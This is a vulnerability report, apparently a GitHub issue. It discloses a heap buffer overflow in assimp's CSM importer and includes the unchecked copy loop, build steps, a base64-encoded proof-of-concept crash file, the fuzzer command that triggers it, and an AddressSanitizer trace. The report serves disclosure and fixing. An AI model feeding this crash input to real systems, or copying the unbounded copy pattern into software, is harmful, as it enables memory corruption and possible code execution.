Bug: Heap-based Buffer Overflow in Assimp::CSMImporter::InternReadFile

[d3ng03]

Summary

heap buffer overflow in Assimp::CSMImporter::InternReadFile. An attacker could potentially exploit the vulnerability to cause a remote code execution, if they can trick the victim into running assimp on a malformed CSM file.

Affected

assimp>=5.4.3

Details

In code/AssetLib/CSM/CSMLoader.cpp:154, ot is 1024 char pointer array. There is no buffer length check, which cause heap buffer overflow and able to write 1 byte.

char* ot = nda->mNodeName.data;
while (!IsSpaceOrNewLine(*buffer)) {
    *ot++ = *buffer++;
}

PoC

1. build assimp with sanitizer

git clone https://github.com/assimp/assimp.git && cd assimp

cmake CMakeLists.txt -G "Ninja" -DBUILD_SHARED_LIBS=OFF -DASSIMP_BUILD_ZLIB=ON \
                    -DASSIMP_BUILD_TESTS=OFF -DASSIMP_BUILD_ASSIMP_TOOLS=OFF \
                    -DASSIMP_BUILD_SAMPLES=OFF
cmake --build .

clang -fsanitize=address,fuzzer -std=c++11 -Iinclude fuzz/assimp_fuzzer.cc -o assimp_fuzzer ./lib/libassimp.a ./contrib/zlib/libzlibstatic.a

1. run fuzzer to trigger bug

echo "TFdTJyBBJA0gTG9hZE9iag0NDSQkJCQkJCQkJCQkJCQkJCRGaXJzdEZyYW1lDScxdFBvaW7/DSEx
JEZpbGVOYW1lDHRsbDwGJCQkJCQkJCRGaXJzdEZyYW1lDSAxOUYkDQ0NDQ0NIExvYWRPYmoNDQ0k
JCQkJCQkJG9yZGVyJCQkJCQkJCRGaXJzdEZyYW1lYW1lTmFtZQx0bGw8Bk5fXyRpbmZpbml0ZTov
L3MxLw0NDQ0NDSBMb2FkT2JqDQ0NJCQkJCQkJCRvcmRlciBMb2FkT2Jqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq1Wpqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampq
ampqampqampqampqampqampqampqampqampqampqampqDQ0NJCQkJCQkJCRvcmRlcg0NDSQkRmly
c3RGcmFtZQ0gMTlsPAZOX18kOi8vc0xXU0NUT0JKRUNUDSl0CQoKeClFeAopRXs8Bk5fXyQ6Lw==" | base64 -d > crash

./assimp_fuzzer ./crash

Sanitizer Report

=================================================================
==924291==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6190000045b8 at pc 0x556b190dd09e bp 0x7fff6518c5d0 sp 0x7fff6518c5c8
WRITE of size 1 at 0x6190000045b8 thread T0
    #0 0x556b190dd09d in Assimp::CSMImporter::InternReadFile(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, aiScene*, Assimp::IOSystem*) /workspace/assimp_fuzzer/assimp_asan/code/AssetLib/CSM/CSMLoader.cpp:154:31
    #1 0x556b18d04a12 in Assimp::BaseImporter::ReadFile(Assimp::Importer*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, Assimp::IOSystem*) /workspace/assimp_fuzzer/assimp_asan/code/Common/BaseImporter.cpp:131:9
    #2 0x556b1877f7e4 in Assimp::Importer::ReadFile(char const*, unsigned int) /workspace/assimp_fuzzer/assimp_asan/code/Common/Importer.cpp:709:30
    #3 0x556b1877d0a2 in Assimp::Importer::ReadFileFromMemory(void const*, unsigned long, unsigned int, char const*) /workspace/assimp_fuzzer/assimp_asan/code/Common/Importer.cpp:507:9
    #4 0x556b18778717 in LLVMFuzzerTestOneInput (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x491717) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #5 0x556b186a1203 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x3ba203) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #6 0x556b1868af7f in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x3a3f7f) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #7 0x556b18690cd6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x3a9cd6) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #8 0x556b186baaf2 in main (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x3d3af2) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #9 0x7fb4814a9d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #10 0x7fb4814a9e3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #11 0x556b18685844 in _start (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x39e844) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)

0x6190000045b8 is located 0 bytes to the right of 1080-byte region [0x619000004180,0x6190000045b8)
allocated by thread T0 here:
    #0 0x556b1873d87e in malloc (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x45687e) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #1 0x7fb48185e98b in operator new(unsigned long) (/lib/x86_64-linux-gnu/libstdc++.so.6+0xae98b) (BuildId: e37fe1a879783838de78cbc8c80621fa685d58a2)
    #2 0x556b18d04a12 in Assimp::BaseImporter::ReadFile(Assimp::Importer*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, Assimp::IOSystem*) /workspace/assimp_fuzzer/assimp_asan/code/Common/BaseImporter.cpp:131:9
    #3 0x556b1877f7e4 in Assimp::Importer::ReadFile(char const*, unsigned int) /workspace/assimp_fuzzer/assimp_asan/code/Common/Importer.cpp:709:30
    #4 0x556b1877d0a2 in Assimp::Importer::ReadFileFromMemory(void const*, unsigned long, unsigned int, char const*) /workspace/assimp_fuzzer/assimp_asan/code/Common/Importer.cpp:507:9
    #5 0x556b18778717 in LLVMFuzzerTestOneInput (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x491717) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #6 0x556b186a1203 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x3ba203) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #7 0x556b1868af7f in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x3a3f7f) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #8 0x556b18690cd6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x3a9cd6) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #9 0x556b186baaf2 in main (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x3d3af2) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #10 0x7fb4814a9d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /workspace/assimp_fuzzer/assimp_asan/code/AssetLib/CSM/CSMLoader.cpp:154:31 in Assimp::CSMImporter::InternReadFile(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, aiScene*, Assimp::IOSystem*)
Shadow bytes around the buggy address:
  0x0c327fff8860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff8870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff8880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff8890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff88a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c327fff88b0: 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa
  0x0c327fff88c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c327fff88d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c327fff88e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c327fff88f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c327fff8900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==924291==ABORTING

---

Common weakness enumerator (CWE)

• CWE-122: Heap-based Buffer Overflow

[tellypresence]

Please add "Fuzzer" label